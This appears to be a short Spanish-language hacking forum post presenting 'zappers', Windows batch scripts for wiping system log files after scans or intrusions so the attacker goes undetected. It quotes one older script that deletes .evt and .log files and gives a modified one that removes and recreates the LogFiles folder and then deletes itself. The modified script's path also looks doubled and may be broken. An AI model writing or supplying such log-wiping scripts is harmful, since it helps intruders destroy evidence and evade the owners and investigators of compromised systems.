Cada vez que scanneamos, hacemos una intrusion, un ping una pc o una ip, esta deja un registro en C:\Windows\System32\LogFiles
Los Zappers sirven para borrar esos registros o logs y asi que no se sospeche o no tengan formas de descubrirnos.
Mirando un poco el codigo de Panzer de IH. Decidi modificarlo un poco, ya que note que en Windows 7 no funcionaria.
Su Codigo es el siguiente:
1
2
3
4
5 @echo off
pushd %systemroot%\system32\logfiles
del /f /q *.evt
del /f /q *.log
exit
Lo que hace es dirigirse al directorio de logfiles y borrar todos los *.evt y *.log que hay en ella. Pero note que en Windows 7 y posteriores no funciona, crea directorios y dentro de estos directorio, archivos con extensiones *.txt, *.evl entre otras…
He optado por modificar un poco el codigo:
1
2
3
4
5 @echo off
rd /s /q %systemroot%\Windows\System32\LogFiles
md %systemroot%\Windows\System32\LogFiles
del /f /q %0
exit
Lo que hace este codigo es eliminar la carpeta LogFiles con todo su
arbol (Directorios y Archivos) y la vuelve a crear vacia. Despues de
hacer estas dos cosas, se autoelimina el zapper para evitar ser
detectado.
ANTRAX